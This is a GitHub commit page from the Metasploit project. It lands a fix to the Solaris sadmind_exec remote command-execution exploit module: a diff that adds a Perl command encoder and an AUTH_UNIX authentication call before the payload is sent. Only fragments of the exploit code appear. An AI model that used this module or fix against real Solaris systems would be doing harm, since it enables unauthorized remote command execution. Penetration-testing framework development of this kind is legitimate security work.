Skip to content

Commit e6e4aab

Browse files
committed
Land rapid7#3518, @midnitesnake's fix for solaris sadmind_exec
2 parents 0b6406a + bc57e5d commit e6e4aab

File tree

1 file changed

+5
-3
lines changed

1 file changed

+5
-3
lines changed

modules/exploits/solaris/sunrpc/sadmind_exec.rb

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ def initialize(info = {})
2121
2222
Vulnerable systems include solaris 2.7, 8, and 9
2323
},
24-
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz' ],
24+
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
2525
'License' => MSF_LICENSE,
2626
'References' =>
2727
[
@@ -35,9 +35,10 @@ def initialize(info = {})
3535
'Arch' => ARCH_CMD,
3636
'Payload' =>
3737
{
38-
'Space' => 2000,
39-
'BadChars' => "\x00",
38+
'Space' => 2000,
39+
'BadChars' => "\x00",
4040
'DisableNops' => true,
41+
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
4142
'Compat' =>
4243
{
4344
'PayloadType' => 'cmd',
@@ -83,6 +84,7 @@ def exploit
8384
hostname = datastore['HOSTNAME']
8485
end
8586

87+
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
8688
response = sadmind_request(hostname, payload.encoded)
8789
sunrpc_destroy
8890

0 commit comments

Comments
 (0)